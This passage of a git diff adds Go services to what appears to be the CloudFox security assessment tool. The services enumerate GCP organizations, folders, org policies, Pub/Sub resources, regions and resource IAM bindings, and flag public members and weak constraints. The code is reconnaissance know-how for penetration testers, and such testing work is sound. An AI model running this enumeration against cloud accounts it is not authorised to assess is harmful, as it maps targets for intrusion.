!= nil { + return nil, err + } + + var roots []HierarchyNode + + for _, org := range orgs { + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgNode := HierarchyNode{ + Type: "organization", + ID: orgID, + DisplayName: org.DisplayName, + Depth: 0, + Children: []HierarchyNode{}, + } + + // Get folders under this org + s.buildFolderTree(&orgNode, org.Name, 1) + + // Get projects directly under org + projects, err := s.SearchProjects(org.Name) + if err == nil { + for _, proj := range projects { + projNode 
:= HierarchyNode{ + Type: "project", + ID: proj.ProjectID, + DisplayName: proj.DisplayName, + Parent: proj.Parent, + Depth: 1, + } + orgNode.Children = append(orgNode.Children, projNode) + } + } + + roots = append(roots, orgNode) + } + + return roots, nil +} + +// buildFolderTree recursively builds folder tree +func (s *OrganizationsService) buildFolderTree(parent *HierarchyNode, parentName string, depth int) { + folders, err := s.SearchFolders(parentName) + if err != nil { + return + } + + for _, folder := range folders { + folderID := strings.TrimPrefix(folder.Name, "folders/") + folderNode := HierarchyNode{ + Type: "folder", + ID: folderID, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + Depth: depth, + Children: []HierarchyNode{}, + } + + // Recursively get child folders + s.buildFolderTree(&folderNode, folder.Name, depth+1) + + // Get projects under this folder + projects, err := s.SearchProjects(folder.Name) + if err == nil { + for _, proj := range projects { + projNode := HierarchyNode{ + Type: "project", + ID: proj.ProjectID, + DisplayName: proj.DisplayName, + Parent: proj.Parent, + Depth: depth + 1, + } + folderNode.Children = append(folderNode.Children, projNode) + } + } + + parent.Children = append(parent.Children, folderNode) + } +} diff --git a/gcp/services/orgpolicyService/orgpolicyService.go b/gcp/services/orgpolicyService/orgpolicyService.go new file mode 100644 index 00000000..4fff232c --- /dev/null +++ b/gcp/services/orgpolicyService/orgpolicyService.go @@ -0,0 +1,226 @@ +package orgpolicyservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + "google.golang.org/api/orgpolicy/v2" +) + +type OrgPolicyService struct { + session *gcpinternal.SafeSession +} + +func New() *OrgPolicyService { + return &OrgPolicyService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *OrgPolicyService { + return 
&OrgPolicyService{session: session} +} + +// getService returns an Org Policy service client using cached session if available +func (s *OrgPolicyService) getService(ctx context.Context) (*orgpolicy.Service, error) { + if s.session != nil { + return sdk.CachedGetOrgPolicyService(ctx, s.session) + } + return orgpolicy.NewService(ctx) +} + +// OrgPolicyInfo represents an organization policy +type OrgPolicyInfo struct { + Name string `json:"name"` + Constraint string `json:"constraint"` + ProjectID string `json:"projectId"` + Enforced bool `json:"enforced"` + AllowAll bool `json:"allowAll"` + DenyAll bool `json:"denyAll"` + AllowedValues []string `json:"allowedValues"` + DeniedValues []string `json:"deniedValues"` + InheritParent bool `json:"inheritFromParent"` + Description string `json:"description"` +} + +// SecurityRelevantConstraints maps constraint names to their security implications +var SecurityRelevantConstraints = map[string]struct { + Description string + RiskWhenWeak string + DefaultSecure bool +}{ + // Domain restriction + "constraints/iam.allowedPolicyMemberDomains": { + Description: "Restricts IAM members to specific domains", + RiskWhenWeak: "Allows external users/accounts to be granted IAM permissions", + DefaultSecure: false, + }, + // Service account key creation + "constraints/iam.disableServiceAccountKeyCreation": { + Description: "Prevents service account key creation", + RiskWhenWeak: "Allows persistent SA key creation for long-term access", + DefaultSecure: false, + }, + "constraints/iam.disableServiceAccountKeyUpload": { + Description: "Prevents uploading service account keys", + RiskWhenWeak: "Allows external keys to be uploaded for SA access", + DefaultSecure: false, + }, + // Workload identity + "constraints/iam.workloadIdentityPoolProviders": { + Description: "Restricts workload identity pool providers", + RiskWhenWeak: "Allows external identity providers to assume GCP identities", + DefaultSecure: false, + }, + 
"constraints/iam.workloadIdentityPoolAwsAccounts": { + Description: "Restricts AWS accounts for workload identity", + RiskWhenWeak: "Allows any AWS account to assume GCP identity", + DefaultSecure: false, + }, + // Compute restrictions + "constraints/compute.requireShieldedVm": { + Description: "Requires Shielded VMs", + RiskWhenWeak: "Allows VMs without Shielded VM protections", + DefaultSecure: false, + }, + "constraints/compute.requireOsLogin": { + Description: "Requires OS Login for SSH access", + RiskWhenWeak: "Allows metadata-based SSH keys instead of centralized access", + DefaultSecure: false, + }, + "constraints/compute.vmExternalIpAccess": { + Description: "Restricts which VMs can have external IPs", + RiskWhenWeak: "Allows any VM to have an external IP", + DefaultSecure: false, + }, + "constraints/compute.disableSerialPortAccess": { + Description: "Disables serial port access to VMs", + RiskWhenWeak: "Allows serial console access to VMs", + DefaultSecure: false, + }, + "constraints/compute.disableNestedVirtualization": { + Description: "Disables nested virtualization", + RiskWhenWeak: "Allows nested VMs for potential sandbox escape", + DefaultSecure: false, + }, + // Storage restrictions + "constraints/storage.uniformBucketLevelAccess": { + Description: "Requires uniform bucket-level access", + RiskWhenWeak: "Allows ACL-based access which is harder to audit", + DefaultSecure: false, + }, + "constraints/storage.publicAccessPrevention": { + Description: "Prevents public access to storage buckets", + RiskWhenWeak: "Allows public bucket/object access", + DefaultSecure: false, + }, + // SQL restrictions + "constraints/sql.restrictPublicIp": { + Description: "Restricts public IPs on Cloud SQL", + RiskWhenWeak: "Allows Cloud SQL instances with public IPs", + DefaultSecure: false, + }, + "constraints/sql.restrictAuthorizedNetworks": { + Description: "Restricts authorized networks for Cloud SQL", + RiskWhenWeak: "Allows broad network access to Cloud SQL", + 
DefaultSecure: false, + }, + // GKE restrictions + "constraints/container.restrictPublicEndpoint": { + Description: "Restricts GKE public endpoints", + RiskWhenWeak: "Allows GKE clusters with public API endpoints", + DefaultSecure: false, + }, + // Resource location + "constraints/gcp.resourceLocations": { + Description: "Restricts resource locations/regions", + RiskWhenWeak: "Allows resources in any region (compliance risk)", + DefaultSecure: false, + }, + // Service usage + "constraints/serviceuser.services": { + Description: "Restricts which services can be enabled", + RiskWhenWeak: "Allows any GCP service to be enabled", + DefaultSecure: false, + }, + // VPC + "constraints/compute.restrictSharedVpcSubnetworks": { + Description: "Restricts Shared VPC subnetworks", + RiskWhenWeak: "Allows access to any Shared VPC subnetwork", + DefaultSecure: false, + }, + "constraints/compute.restrictVpnPeerIPs": { + Description: "Restricts VPN peer IPs", + RiskWhenWeak: "Allows VPN tunnels to any peer", + DefaultSecure: false, + }, +} + +// ListProjectPolicies lists all org policies for a project +func (s *OrgPolicyService) ListProjectPolicies(projectID string) ([]OrgPolicyInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "orgpolicy.googleapis.com") + } + + var policies []OrgPolicyInfo + parent := fmt.Sprintf("projects/%s", projectID) + + err = service.Projects.Policies.List(parent).Pages(ctx, func(resp *orgpolicy.GoogleCloudOrgpolicyV2ListPoliciesResponse) error { + for _, policy := range resp.Policies { + info := s.parsePolicyInfo(policy, projectID) + policies = append(policies, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "orgpolicy.googleapis.com") + } + + return policies, nil +} + +func (s *OrgPolicyService) parsePolicyInfo(policy *orgpolicy.GoogleCloudOrgpolicyV2Policy, projectID string) OrgPolicyInfo { + info := OrgPolicyInfo{ + 
Name: policy.Name, + ProjectID: projectID, + } + + // Extract constraint name from policy name + parts := strings.Split(policy.Name, "/policies/") + if len(parts) > 1 { + info.Constraint = "constraints/" + parts[1] + } + + // Get description from SecurityRelevantConstraints if available + if secInfo, ok := SecurityRelevantConstraints[info.Constraint]; ok { + info.Description = secInfo.Description + } + + // Parse the spec + if policy.Spec != nil { + info.InheritParent = policy.Spec.InheritFromParent + + for _, rule := range policy.Spec.Rules { + if rule == nil { + continue + } + + // In v2 API, these are booleans + info.Enforced = rule.Enforce + info.AllowAll = rule.AllowAll + info.DenyAll = rule.DenyAll + + if rule.Values != nil { + info.AllowedValues = append(info.AllowedValues, rule.Values.AllowedValues...) + info.DeniedValues = append(info.DeniedValues, rule.Values.DeniedValues...) + } + } + } + + return info +} + diff --git a/gcp/services/pubsubService/pubsubService.go b/gcp/services/pubsubService/pubsubService.go new file mode 100644 index 00000000..143ce534 --- /dev/null +++ b/gcp/services/pubsubService/pubsubService.go @@ -0,0 +1,309 @@ +package pubsubservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + pubsub "google.golang.org/api/pubsub/v1" +) + +type PubSubService struct { + session *gcpinternal.SafeSession +} + +func New() *PubSubService { + return &PubSubService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *PubSubService { + return &PubSubService{ + session: session, + } +} + +func (ps *PubSubService) getService(ctx context.Context) (*pubsub.Service, error) { + if ps.session != nil { + return sdk.CachedGetPubSubService(ctx, ps.session) + } + return pubsub.NewService(ctx) +} + +// IAMBinding represents a single IAM role/member binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + 
+// TopicInfo holds Pub/Sub topic details with security-relevant information +type TopicInfo struct { + Name string + ProjectID string + KmsKeyName string // Encryption key if set + MessageRetentionDuration string + SchemaSettings string + Labels map[string]string + + // IAM bindings + IAMBindings []IAMBinding + + // Subscriptions count + SubscriptionCount int +} + +// SubscriptionInfo holds Pub/Sub subscription details +type SubscriptionInfo struct { + Name string + ProjectID string + Topic string + TopicProject string // Topic may be in different project + + // Configuration + AckDeadlineSeconds int64 + MessageRetention string + RetainAckedMessages bool + ExpirationPolicy string // TTL + Filter string + + // Push configuration + PushEndpoint string // Empty if pull subscription + PushOIDCAudience string + PushServiceAccount string + + // Dead letter + DeadLetterTopic string + MaxDeliveryAttempts int64 + + // BigQuery export + BigQueryTable string + + // Cloud Storage export + CloudStorageBucket string + + // IAM bindings + IAMBindings []IAMBinding +} + +// Topics retrieves all Pub/Sub topics in a project +func (ps *PubSubService) Topics(projectID string) ([]TopicInfo, error) { + ctx := context.Background() + + service, err := ps.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + + var topics []TopicInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Topics.List(parent) + err = call.Pages(ctx, func(page *pubsub.ListTopicsResponse) error { + for _, topic := range page.Topics { + info := parseTopicInfo(topic, projectID) + + // Get subscription count + subCount, _ := ps.getTopicSubscriptionCount(service, topic.Name) + info.SubscriptionCount = subCount + + // Try to get IAM policy + iamPolicy, iamErr := ps.getTopicIAMPolicy(service, topic.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings = parseIAMBindings(iamPolicy) + } + + topics = append(topics, info) + } + 
return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + + return topics, nil +} + +// Subscriptions retrieves all Pub/Sub subscriptions in a project +func (ps *PubSubService) Subscriptions(projectID string) ([]SubscriptionInfo, error) { + ctx := context.Background() + + service, err := ps.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + + var subscriptions []SubscriptionInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Subscriptions.List(parent) + err = call.Pages(ctx, func(page *pubsub.ListSubscriptionsResponse) error { + for _, sub := range page.Subscriptions { + info := parseSubscriptionInfo(sub, projectID) + + // Try to get IAM policy + iamPolicy, iamErr := ps.getSubscriptionIAMPolicy(service, sub.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings = parseIAMBindings(iamPolicy) + } + + subscriptions = append(subscriptions, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + + return subscriptions, nil +} + +// parseTopicInfo extracts relevant information from a Pub/Sub topic +func parseTopicInfo(topic *pubsub.Topic, projectID string) TopicInfo { + info := TopicInfo{ + Name: extractName(topic.Name), + ProjectID: projectID, + Labels: topic.Labels, + } + + if topic.KmsKeyName != "" { + info.KmsKeyName = topic.KmsKeyName + } + + if topic.MessageRetentionDuration != "" { + info.MessageRetentionDuration = topic.MessageRetentionDuration + } + + if topic.SchemaSettings != nil { + info.SchemaSettings = fmt.Sprintf("%s (%s)", + extractName(topic.SchemaSettings.Schema), + topic.SchemaSettings.Encoding) + } + + return info +} + +// parseSubscriptionInfo extracts relevant information from a Pub/Sub subscription +func parseSubscriptionInfo(sub *pubsub.Subscription, projectID string) SubscriptionInfo { + info := SubscriptionInfo{ + Name: 
sub.Name, + ProjectID: projectID, + Topic: extractName(sub.Topic), + AckDeadlineSeconds: sub.AckDeadlineSeconds, + RetainAckedMessages: sub.RetainAckedMessages, + Filter: sub.Filter, + } + + // Extract name from full path + info.Name = extractName(sub.Name) + + // Extract topic project (may be different from subscription project) + if strings.Contains(sub.Topic, "/") { + parts := strings.Split(sub.Topic, "/") + if len(parts) >= 2 { + info.TopicProject = parts[1] + } + } + + // Message retention + if sub.MessageRetentionDuration != "" { + info.MessageRetention = sub.MessageRetentionDuration + } + + // Expiration policy + if sub.ExpirationPolicy != nil && sub.ExpirationPolicy.Ttl != "" { + info.ExpirationPolicy = sub.ExpirationPolicy.Ttl + } + + // Push configuration + if sub.PushConfig != nil { + info.PushEndpoint = sub.PushConfig.PushEndpoint + + if sub.PushConfig.OidcToken != nil { + info.PushServiceAccount = sub.PushConfig.OidcToken.ServiceAccountEmail + info.PushOIDCAudience = sub.PushConfig.OidcToken.Audience + } + } + + // Dead letter policy + if sub.DeadLetterPolicy != nil { + info.DeadLetterTopic = extractName(sub.DeadLetterPolicy.DeadLetterTopic) + info.MaxDeliveryAttempts = sub.DeadLetterPolicy.MaxDeliveryAttempts + } + + // BigQuery config + if sub.BigqueryConfig != nil { + info.BigQueryTable = sub.BigqueryConfig.Table + } + + // Cloud Storage config + if sub.CloudStorageConfig != nil { + info.CloudStorageBucket = sub.CloudStorageConfig.Bucket + } + + return info +} + +// getTopicSubscriptionCount counts subscriptions for a topic +func (ps *PubSubService) getTopicSubscriptionCount(service *pubsub.Service, topicName string) (int, error) { + ctx := context.Background() + + resp, err := service.Projects.Topics.Subscriptions.List(topicName).Context(ctx).Do() + if err != nil { + return 0, err + } + + return len(resp.Subscriptions), nil +} + +// getTopicIAMPolicy retrieves the IAM policy for a topic +func (ps *PubSubService) getTopicIAMPolicy(service 
*pubsub.Service, topicName string) (*pubsub.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Topics.GetIamPolicy(topicName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// getSubscriptionIAMPolicy retrieves the IAM policy for a subscription +func (ps *PubSubService) getSubscriptionIAMPolicy(service *pubsub.Service, subscriptionName string) (*pubsub.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Subscriptions.GetIamPolicy(subscriptionName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseIAMBindings extracts all IAM bindings from a policy +func parseIAMBindings(policy *pubsub.Policy) []IAMBinding { + var bindings []IAMBinding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + return bindings +} + +// extractName extracts just the resource name from the full resource name +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/regionService/regionService.go b/gcp/services/regionService/regionService.go new file mode 100644 index 00000000..90ca8dc1 --- /dev/null +++ b/gcp/services/regionService/regionService.go @@ -0,0 +1,335 @@ +// Package regionservice provides a unified way to enumerate GCP regions and zones +// with automatic fallback when permissions are denied. +// +// Fallback order: +// 1. Try Compute Engine Regions.List API (requires compute.regions.list) +// 2. Fall back to public Google endpoint (no auth required) +// 3. 
Fall back to hardcoded common regions list +package regionservice + +import ( + "context" + "encoding/json" + "fmt" + "net/http" + "sort" + "strings" + "sync" + "time" + + "google.golang.org/api/compute/v1" +) + +// GCPCloudIPRangesURL is the public Google endpoint that lists all GCP regions +// This endpoint requires no authentication and is updated by Google +const GCPCloudIPRangesURL = "https://www.gstatic.com/ipranges/cloud.json" + +// RegionService provides methods to enumerate GCP regions and zones +type RegionService struct { + computeService *compute.Service + httpClient *http.Client +} + +// RegionInfo contains information about a GCP region +type RegionInfo struct { + Name string // Region name (e.g., "us-central1") + Zones []string // Available zones in this region + Status string // Region status (UP, DOWN, or unknown) +} + +// New creates a new RegionService +func New() *RegionService { + return &RegionService{ + httpClient: &http.Client{Timeout: 10 * time.Second}, + } +} + +// NewWithComputeService creates a RegionService with an existing compute service +func NewWithComputeService(svc *compute.Service) *RegionService { + return &RegionService{ + computeService: svc, + httpClient: &http.Client{Timeout: 10 * time.Second}, + } +} + +// GetRegions returns all GCP regions with automatic fallback +// Tries in order: Compute API -> Public endpoint -> Hardcoded list +func (s *RegionService) GetRegions(ctx context.Context, projectID string) ([]RegionInfo, error) { + // Try Compute Engine API first (most accurate, includes zones) + if projectID != "" { + regions, err := s.getRegionsFromComputeAPI(ctx, projectID) + if err == nil && len(regions) > 0 { + return regions, nil + } + // Log but continue to fallback + } + + // Fall back to public endpoint + regions, err := s.getRegionsFromPublicEndpoint() + if err == nil && len(regions) > 0 { + return regions, nil + } + + // Fall back to hardcoded list + return s.getHardcodedRegions(), nil +} + +// GetRegionNames 
returns just the region names (convenience method) +func (s *RegionService) GetRegionNames(ctx context.Context, projectID string) []string { + regions, _ := s.GetRegions(ctx, projectID) + names := make([]string, len(regions)) + for i, r := range regions { + names[i] = r.Name + } + return names +} + +// GetAllZones returns all zones across all regions +func (s *RegionService) GetAllZones(ctx context.Context, projectID string) []string { + regions, _ := s.GetRegions(ctx, projectID) + var zones []string + for _, r := range regions { + zones = append(zones, r.Zones...) + } + return zones +} + +// getRegionsFromComputeAPI tries to get regions from the Compute Engine API +func (s *RegionService) getRegionsFromComputeAPI(ctx context.Context, projectID string) ([]RegionInfo, error) { + svc := s.computeService + if svc == nil { + var err error + svc, err = compute.NewService(ctx) + if err != nil { + return nil, err + } + } + + resp, err := svc.Regions.List(projectID).Context(ctx).Do() + if err != nil { + return nil, err + } + + regions := make([]RegionInfo, 0, len(resp.Items)) + for _, r := range resp.Items { + info := RegionInfo{ + Name: r.Name, + Status: r.Status, + Zones: make([]string, 0, len(r.Zones)), + } + for _, zoneURL := range r.Zones { + // Extract zone name from URL + parts := strings.Split(zoneURL, "/") + if len(parts) > 0 { + info.Zones = append(info.Zones, parts[len(parts)-1]) + } + } + regions = append(regions, info) + } + + return regions, nil +} + +// cloudIPRangesResponse represents the JSON structure from cloud.json +type cloudIPRangesResponse struct { + SyncToken string `json:"syncToken"` + CreationTime string `json:"creationTime"` + Prefixes []cloudPrefix `json:"prefixes"` +} + +type cloudPrefix struct { + IPv4Prefix string `json:"ipv4Prefix,omitempty"` + IPv6Prefix string `json:"ipv6Prefix,omitempty"` + Service string `json:"service"` + Scope string `json:"scope"` +} + +// getRegionsFromPublicEndpoint fetches regions from the public Google endpoint 
+func (s *RegionService) getRegionsFromPublicEndpoint() ([]RegionInfo, error) { + resp, err := s.httpClient.Get(GCPCloudIPRangesURL) + if err != nil { + return nil, err + } + defer resp.Body.Close() + + if resp.StatusCode != http.StatusOK { + return nil, fmt.Errorf("HTTP %d", resp.StatusCode) + } + + var data cloudIPRangesResponse + if err := json.NewDecoder(resp.Body).Decode(&data); err != nil { + return nil, err + } + + // Extract unique regions + regionSet := make(map[string]bool) + for _, prefix := range data.Prefixes { + scope := prefix.Scope + if scope == "" || scope == "global" { + continue + } + if strings.Contains(scope, "-") && containsDigit(scope) { + regionSet[scope] = true + } + } + + // Convert to RegionInfo with generated zones + regions := make([]RegionInfo, 0, len(regionSet)) + for region := range regionSet { + info := RegionInfo{ + Name: region, + Status: "unknown", + Zones: generateZonesForRegion(region), + } + regions = append(regions, info) + } + + // Sort by name + sort.Slice(regions, func(i, j int) bool { + return regions[i].Name < regions[j].Name + }) + + return regions, nil +} + +// getHardcodedRegions returns a hardcoded list of common GCP regions +func (s *RegionService) getHardcodedRegions() []RegionInfo { + regions := make([]RegionInfo, len(commonGCPRegions)) + for i, name := range commonGCPRegions { + regions[i] = RegionInfo{ + Name: name, + Status: "unknown", + Zones: generateZonesForRegion(name), + } + } + return regions +} + +// generateZonesForRegion generates common zone names for a region +func generateZonesForRegion(region string) []string { + // Most regions have zones a, b, c; some have more + suffixes := []string{"a", "b", "c"} + zones := make([]string, len(suffixes)) + for i, suffix := range suffixes { + zones[i] = region + "-" + suffix + } + return zones +} + +// containsDigit checks if a string contains at least one digit +func containsDigit(s string) bool { + for _, c := range s { + if c >= '0' && c <= '9' { + return true 
+ } + } + return false +} + +// commonGCPRegions is a hardcoded fallback list of common GCP regions +var commonGCPRegions = []string{ + "africa-south1", + "asia-east1", + "asia-east2", + "asia-northeast1", + "asia-northeast2", + "asia-northeast3", + "asia-south1", + "asia-south2", + "asia-southeast1", + "asia-southeast2", + "australia-southeast1", + "australia-southeast2", + "europe-central2", + "europe-north1", + "europe-southwest1", + "europe-west1", + "europe-west2", + "europe-west3", + "europe-west4", + "europe-west6", + "europe-west8", + "europe-west9", + "europe-west10", + "europe-west12", + "me-central1", + "me-central2", + "me-west1", + "northamerica-northeast1", + "northamerica-northeast2", + "southamerica-east1", + "southamerica-west1", + "us-central1", + "us-east1", + "us-east4", + "us-east5", + "us-south1", + "us-west1", + "us-west2", + "us-west3", + "us-west4", +} + +// ---- Cached singleton for convenience ---- + +var ( + defaultService *RegionService + defaultServiceOnce sync.Once + cachedRegions []RegionInfo + cachedRegionsMu sync.RWMutex + cacheTime time.Time + cacheTTL = 1 * time.Hour +) + +// GetDefaultService returns a singleton RegionService +func GetDefaultService() *RegionService { + defaultServiceOnce.Do(func() { + defaultService = New() + }) + return defaultService +} + +// GetCachedRegions returns cached regions, refreshing if stale +// This is the recommended function for most use cases +func GetCachedRegions(ctx context.Context, projectID string) []RegionInfo { + cachedRegionsMu.RLock() + if len(cachedRegions) > 0 && time.Since(cacheTime) < cacheTTL { + result := make([]RegionInfo, len(cachedRegions)) + copy(result, cachedRegions) + cachedRegionsMu.RUnlock() + return result + } + cachedRegionsMu.RUnlock() + + // Fetch fresh + svc := GetDefaultService() + regions, _ := svc.GetRegions(ctx, projectID) + + // Update cache + cachedRegionsMu.Lock() + cachedRegions = regions + cacheTime = time.Now() + cachedRegionsMu.Unlock() + + return regions 
+} + +// GetCachedRegionNames returns just region names from cache +func GetCachedRegionNames(ctx context.Context, projectID string) []string { + regions := GetCachedRegions(ctx, projectID) + names := make([]string, len(regions)) + for i, r := range regions { + names[i] = r.Name + } + return names +} + +// GetCachedZones returns all zones from cached regions +func GetCachedZones(ctx context.Context, projectID string) []string { + regions := GetCachedRegions(ctx, projectID) + var zones []string + for _, r := range regions { + zones = append(zones, r.Zones...) + } + return zones +} diff --git a/gcp/services/resourceIAMService/resourceIAMService.go b/gcp/services/resourceIAMService/resourceIAMService.go new file mode 100644 index 00000000..0885b3e7 --- /dev/null +++ b/gcp/services/resourceIAMService/resourceIAMService.go @@ -0,0 +1,672 @@ +package resourceiamservice + +import ( + "context" + "fmt" + "strings" + + "cloud.google.com/go/bigquery" + "cloud.google.com/go/kms/apiv1" + "cloud.google.com/go/kms/apiv1/kmspb" + "cloud.google.com/go/pubsub" + "cloud.google.com/go/storage" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + run "google.golang.org/api/run/v1" + secretmanager "google.golang.org/api/secretmanager/v1" + "google.golang.org/api/iterator" + "google.golang.org/api/option" + cloudfunctions "google.golang.org/api/cloudfunctions/v1" +) + +// ResourceIAMService handles enumeration of resource-level IAM policies +type ResourceIAMService struct { + session *gcpinternal.SafeSession +} + +// New creates a new ResourceIAMService +func New() *ResourceIAMService { + return &ResourceIAMService{} +} + +// NewWithSession creates a ResourceIAMService with a SafeSession +func NewWithSession(session *gcpinternal.SafeSession) *ResourceIAMService { + return &ResourceIAMService{session: session} +} + +// getClientOption returns the 
appropriate client option based on session +func (s *ResourceIAMService) getClientOption() option.ClientOption { + if s.session != nil { + return s.session.GetClientOption() + } + return nil +} + +// getSecretManagerService returns a cached Secret Manager service +func (s *ResourceIAMService) getSecretManagerService(ctx context.Context) (*secretmanager.Service, error) { + if s.session != nil { + return sdk.CachedGetSecretManagerService(ctx, s.session) + } + return secretmanager.NewService(ctx) +} + +// getCloudFunctionsService returns a cached Cloud Functions service (v1) +func (s *ResourceIAMService) getCloudFunctionsService(ctx context.Context) (*cloudfunctions.Service, error) { + if s.session != nil { + return sdk.CachedGetCloudFunctionsService(ctx, s.session) + } + return cloudfunctions.NewService(ctx) +} + +// getCloudRunService returns a cached Cloud Run service +func (s *ResourceIAMService) getCloudRunService(ctx context.Context) (*run.APIService, error) { + if s.session != nil { + return sdk.CachedGetCloudRunService(ctx, s.session) + } + return run.NewService(ctx) +} + +// ResourceIAMBinding represents an IAM binding on a specific resource +type ResourceIAMBinding struct { + ResourceType string `json:"resourceType"` // bucket, dataset, topic, secret, etc. 
+ ResourceName string `json:"resourceName"` // Full resource name + ResourceID string `json:"resourceId"` // Short identifier + ProjectID string `json:"projectId"` + Role string `json:"role"` + Member string `json:"member"` + MemberType string `json:"memberType"` // user, serviceAccount, group, allUsers, allAuthenticatedUsers + MemberEmail string `json:"memberEmail"` + IsPublic bool `json:"isPublic"` // allUsers or allAuthenticatedUsers + HasCondition bool `json:"hasCondition"` + ConditionTitle string `json:"conditionTitle"` + ConditionExpression string `json:"conditionExpression"` // Full CEL expression +} + +// GetAllResourceIAM enumerates IAM policies across all supported resource types +func (s *ResourceIAMService) GetAllResourceIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var allBindings []ResourceIAMBinding + + // Get bucket IAM + bucketBindings, err := s.GetBucketIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, bucketBindings...) + } + + // Get BigQuery dataset IAM + bqBindings, err := s.GetBigQueryDatasetIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, bqBindings...) + } + + // Get Pub/Sub topic IAM + pubsubBindings, err := s.GetPubSubIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, pubsubBindings...) + } + + // Get Secret Manager IAM + secretBindings, err := s.GetSecretManagerIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, secretBindings...) + } + + // Get KMS IAM + kmsBindings, err := s.GetKMSIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, kmsBindings...) + } + + // Get Cloud Functions IAM + functionBindings, err := s.GetCloudFunctionsIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, functionBindings...) + } + + // Get Cloud Run IAM + runBindings, err := s.GetCloudRunIAM(ctx, projectID) + if err == nil { + allBindings = append(allBindings, runBindings...) 
+ } + + return allBindings, nil +} + +// GetBucketIAM enumerates IAM policies on Cloud Storage buckets +func (s *ResourceIAMService) GetBucketIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *storage.Client + var err error + if s.session != nil { + client, err = storage.NewClient(ctx, s.getClientOption()) + } else { + client, err = storage.NewClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + defer client.Close() + + // List buckets + it := client.Buckets(ctx, projectID) + for { + bucketAttrs, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this bucket + bucket := client.Bucket(bucketAttrs.Name) + policy, err := bucket.IAM().Policy(ctx) + if err != nil { + continue + } + + // Convert policy to bindings + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := ResourceIAMBinding{ + ResourceType: "bucket", + ResourceName: fmt.Sprintf("gs://%s", bucketAttrs.Name), + ResourceID: bucketAttrs.Name, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + } + } + } + + return bindings, nil +} + +// GetBigQueryDatasetIAM enumerates IAM policies on BigQuery datasets +func (s *ResourceIAMService) GetBigQueryDatasetIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *bigquery.Client + var err error + if s.session != nil { + client, err = bigquery.NewClient(ctx, projectID, s.getClientOption()) + } else { + client, err = bigquery.NewClient(ctx, projectID) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") + } + defer client.Close() + + // List datasets + it 
:= client.Datasets(ctx) + for { + dataset, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get metadata which includes access entries (IAM-like) + meta, err := dataset.Metadata(ctx) + if err != nil { + continue + } + + // BigQuery uses Access entries instead of IAM policies + for _, access := range meta.Access { + member := access.Entity + entityTypeStr := fmt.Sprintf("%v", access.EntityType) + + // Determine member type and if public based on entity type + isPublic := false + memberType := entityTypeStr + + switch access.EntityType { + case bigquery.UserEmailEntity: + memberType = "User" + member = "user:" + access.Entity + case bigquery.GroupEmailEntity: + memberType = "Group" + member = "group:" + access.Entity + case bigquery.DomainEntity: + memberType = "Domain" + member = "domain:" + access.Entity + case bigquery.SpecialGroupEntity: + // Special groups include allAuthenticatedUsers + if access.Entity == "allAuthenticatedUsers" { + memberType = "allAuthenticatedUsers" + member = "allAuthenticatedUsers" + isPublic = true + } else { + memberType = "SpecialGroup" + } + case bigquery.IAMMemberEntity: + memberType = determineMemberType(access.Entity) + isPublic = isPublicMember(access.Entity) + } + + if member == "" { + continue + } + + binding := ResourceIAMBinding{ + ResourceType: "dataset", + ResourceName: fmt.Sprintf("%s.%s", projectID, dataset.DatasetID), + ResourceID: 